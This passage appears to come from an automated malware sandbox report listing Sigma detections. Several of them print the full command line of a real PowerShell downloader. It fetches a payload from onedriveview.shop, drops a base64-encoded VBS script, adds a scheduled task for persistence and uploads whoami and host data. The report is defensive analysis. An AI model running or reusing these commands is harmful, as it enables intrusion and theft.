$dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ProcessId: 7416, ProcessName: wscript.exe
              Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
              Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5904, TargetFilename: C:\Users\Public\Libraries\Libraries.vbs
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5904, TargetFilename: C:\Users\Public\Libraries\Libraries.vbs
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5